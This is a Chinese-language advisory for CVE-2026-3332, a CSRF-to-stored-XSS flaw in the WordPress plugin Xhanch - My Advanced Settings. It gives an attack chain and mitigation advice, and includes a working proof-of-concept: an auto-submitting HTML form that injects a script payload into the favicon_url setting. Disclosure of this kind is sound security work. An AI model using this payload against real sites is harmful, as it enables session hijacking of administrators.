CVE-2026-3332 CVSS 4.3 中危

CVE-2026-3332: Xhanch插件CSRF及存储型XSS漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-3332

漏洞类型

CSRF, 存储型XSS

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Xhanch - My Advanced Settings

漏洞概述

WordPress插件Xhanch - My Advanced Settings在1.1.2及以下版本存在CSRF漏洞。由于设置处理函数缺少nonce验证，攻击者可诱导管理员修改配置。因favicon_url等参数输出未转义，可进一步导致存储型XSS攻击。

技术细节

该漏洞位于插件admin/setting.php的xms_setting()函数中，由于未对请求进行nonce验证，导致存在CSRF漏洞。攻击者可构造恶意页面诱导管理员点击，从而伪造请求修改插件设置。受影响参数包括favicon_url和ga_acc_id。由于插件在前端输出这些设置时未进行转义处理，攻击者可注入恶意脚本，将CSRF升级为存储型XSS，进而窃取凭据或接管会话。

攻击链分析

STEP 1

1. 侦察

攻击者识别目标网站使用的是Xhanch - My Advanced Settings插件且版本低于或等于1.1.2。

STEP 2

2. 投递

攻击者构造包含恶意HTML代码的页面，并通过钓鱼邮件或社会工程学手段诱导网站管理员访问该链接。

STEP 3

3. CSRF利用

管理员在已登录状态下访问恶意页面，浏览器自动向插件设置页面发送伪造的POST请求，修改favicon_url等设置。

STEP 4

4. 触发XSS

插件将包含恶意脚本的设置保存到数据库。当管理员或其他用户访问网站前端页面时，未转义的恶意脚本被执行。

STEP 5

5. 达成目标

攻击者利用XSS窃取管理员Cookie、会话令牌，或重定向到恶意网站，从而接管账户权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CSRF to Stored XSS in Xhanch Plugin -->
<html>
  <body>
    <!-- Form targeting the vulnerable settings page -->
    <form action="http://target-site/wp-admin/admin.php?page=xhanch-my-advanced-settings" method="POST">
      <input type="hidden" name="xms_setting" value="save" />
      <!-- Injecting malicious JavaScript into favicon_url -->
      <input type="hidden" name="favicon_url" value='"><script>alert(document.cookie)</script><"' />
      <input type="hidden" name="ga_acc_id" value="" />
      <input type="submit" value="Click me!" />
    </form>
    <script>
      // Auto-submit to simulate attack without user interaction on the button
      document.forms[0].submit();
    </script>
  </body>
</html>

影响范围

Xhanch - My Advanced Settings <= 1.1.2

防御指南

临时缓解措施

建议立即禁用该插件直至官方发布修复补丁；若必须使用，应在WAF层面对设置更新请求增加Referer检查，防止跨域请求伪造。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表